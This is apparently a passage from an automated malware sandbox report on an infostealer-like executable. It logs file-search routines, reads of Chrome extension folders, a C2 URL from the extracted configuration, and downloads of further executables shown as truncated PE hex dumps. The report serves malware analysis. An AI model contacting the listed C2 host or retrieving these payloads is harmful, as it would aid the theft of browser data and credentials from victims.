Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	11_2_0040D8C0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_0040F4F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	11_2_0040BCB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	11_2_004139B0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	11_2_0040E270
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_00401710
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_004143F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_0040DC50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	11_2_00414050
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	11_2_0040EB60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	11_2_004133C0

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 98MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://85.28.47.31/5499d72b3a3e55be.php

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 35

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.6:59286 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:63315 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:63380 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:58975 -> 162.159.36.2:53

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 11:49:05 GMTContent-Type: application/octet-streamContent-Length: 265728Last-Modified: Fri, 26 Jul 2024 11:45:54 GMTConnection: keep-aliveETag: "66a38c72-40e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 45 b1 47 ff 01 d0 29 ac 01 d0 29 ac 01 d0 29 ac 6e a6 82 ac 1a d0 29 ac 6e a6 b7 ac 11 d0 29 ac 6e a6 83 ac 65 d0 29 ac 08 a8 ba ac 08 d0 29 ac 01 d0 28 ac 73 d0 29 ac 6e a6 86 ac 00 d0 29 ac 6e a6 b3 ac 00 d0 29 ac 6e a6 b4 ac 00 d0 29 ac 52 69 63 68 01 d0 29 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f5 24 f0 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 b4 03 02 00 00 00 00 3c 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 05 02 00 04 00 00 0a fe 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 58 02 00 64 00 00 00 00 c0 04 02 f0 d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 19 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 32 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 74 69 00 00 00 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6a 6f 74 69 62 65 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 d7 00 00 00 c0 04 02 00 d8 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 11:49:08 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 11:16:06 GMTConnection: keep-aliveETag: "66a38576-16600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 c2 d2 00 00 00 50 00 00 00 d4 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9d 33 00 00 00 30 01 00 00 34 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 17 00 00 00 70 01 00 00 12 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 